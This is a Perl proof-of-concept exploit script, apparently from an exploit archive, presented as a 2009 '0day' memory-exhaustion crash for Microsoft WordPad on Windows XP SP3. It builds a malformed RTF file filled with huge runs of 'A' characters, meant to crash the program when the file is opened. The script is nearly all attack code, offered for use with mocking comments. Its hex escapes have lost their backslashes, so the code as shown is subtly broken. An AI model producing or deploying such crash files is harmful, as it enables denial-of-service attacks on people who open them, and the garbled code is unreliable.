Home / os / win10

mswordpad-crash.txt

Posted on 13 August 2009

#!/usr/bin/perl
#Microsoft Wordpad on WinXP SP3 Memory Exhaustion Vulnerability - 0day
#Works on WinXP SP3!
#bug found by murderkey in Hellcode Labs.
#exploit coded by karak0rsan aka musashi
#Hellcode Resarch
#just a fuckin' lame 0day bug for fun!

$file = "hellcoded.rtf";
$header =
"x7bx5cx72x74x66x31x5cx61x6ex73x69x5cx61x6ex73x69x63x70x67x31x32".
"x35x34x5cx64x65x66x66x30x5cx64x65x66x6cx61x6ex67x31x30x35x35x7b".
"x5cx66x6fx6ex74x74x62x6cx7bx5cx66x30x5cx66x73x77x69x73x73x5cx66".
"x63x68x61x72x73x65x74x31x36x32x7bx5cx2ax5cx66x6ex61x6dx65x20x41".
"x72x69x61x6cx3bx7dx41x72x69x61x6cx20x54x55x52x3bx7dx7dx0ax7bx5c".
"x2ax5cx67x65x6ex65x72x61x74x6fx72x20x4dx73x66x74x65x64x69x74x20".
"x35x2ex34x31x2ex31x35x2ex31x35x31x35x3bx7dx5cx76x69x65x77x6bx69".
"x6ex64x34x5cx75x63x31x5cx70x61x72x64x5cx66x30x5cx66x73x32x30";

$subheader = "x5cx41x41x41x41x41x5cx41x41x41x41x5cx70x61x72x0ax7dx0ax00";
$ekheader = "x5cx70x61x72x0a";
$buffer = "A" x 578001;
$buffer2 = "A" x 289000;
$buffer3 = "A" x 18186;
$buffer4 = "A" x 863973;
$buffer5= "A" x 578000;
$memory = $header.$buffer.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer4.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$ekheader.$buffer5.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer3.$subheader;
open(file, '>' . $file);
print file $memory;
close(file);
print "File PoC exploit has created!
";

exit(); */

 

TOP